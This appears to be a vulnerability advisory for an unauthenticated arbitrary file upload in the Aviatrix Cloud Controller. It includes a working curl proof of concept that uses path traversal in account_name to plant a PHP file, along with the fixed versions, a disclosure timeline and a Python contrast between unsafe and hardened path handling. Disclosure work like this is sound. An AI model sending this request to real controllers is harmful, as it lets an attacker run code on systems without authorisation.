While the Aviatrix UI requires authentication, many API calls do not enforce a check for authentication. Some of these API calls allow an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem. These uploaded scripts will be processed by the web frontend, allowing an attacker to run code of their choosing.
Make the following request to the Aviatrix Cloud Controller:
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/test.php -d 'data=hello<?php phpinfo()?>'
Visit https://aviatrix.domain.tld/v1/test. This will show the PHP Version page.
Upgrade to one of the following versions:
UserConnect-6.2-1804.2043 or later
UserConnect-6.3-1804.2490 or later
UserConnect-6.4-1804.2838 or later
UserConnect-6.5-1804.1922 or later
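The issue described above combines a missing authentication check with a request value (account_name) used as a file path. The following Python example is added here and is not Aviatrix code or the vendor's fix; it contrasts the unsafe path handling with a hardened handler. BASE_DIR, the name allow-list and all function names are assumptions.

```python
import posixpath
import re

# Hypothetical storage directory; the page does not say where the controller writes.
BASE_DIR = "/opt/controller/metrics"

# Assumed allow-list for account names: letters, digits, dash, underscore.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


class RejectedName(ValueError):
    """Raised when a request value cannot be used as a file name."""


def naive_target(account_name: str) -> str:
    """Unsafe pattern: append the request value and let '..' segments resolve."""
    return posixpath.normpath(BASE_DIR + "/" + account_name)


def safe_target(account_name: str, authenticated: bool) -> str:
    """Hardened pattern: auth check first, then allow-list, then containment."""
    if not authenticated:
        raise PermissionError("API call requires an authenticated session")
    if not SAFE_NAME.fullmatch(account_name):
        raise RejectedName(account_name)
    target = posixpath.normpath(posixpath.join(BASE_DIR, account_name))
    # Defence in depth: the resolved path must stay strictly below BASE_DIR.
    if target == BASE_DIR or posixpath.commonpath([BASE_DIR, target]) != BASE_DIR:
        raise RejectedName(account_name)
    return target


if __name__ == "__main__":
    reported_value = "/../../../var/www/php/test.php"  # value from the request above
    print("naive join resolves to:", naive_target(reported_value))
    for name, authed in [(reported_value, True), ("prod-account", False),
                         ("prod-account", True)]:
        try:
            print("accepted:", safe_target(name, authed))
        except (PermissionError, RejectedName) as exc:
            print("rejected:", type(exc).__name__, exc)
```

Keeping the storage directory outside any path the web frontend executes as PHP removes the second half of the chain even if a name check is bypassed.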
2021-05-12: Discovered
2021-08-24: Reported to Aviatrix security team
2021-08-26: Aviatrix security team confirm vulnerability will be fixed in forthcoming release
2021-09-11: Fix released
2021-09-12: CVE requested
2021-09-13: CVE allocated
https://github.com/0xAgun/CVE-2021-40870
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40870.yaml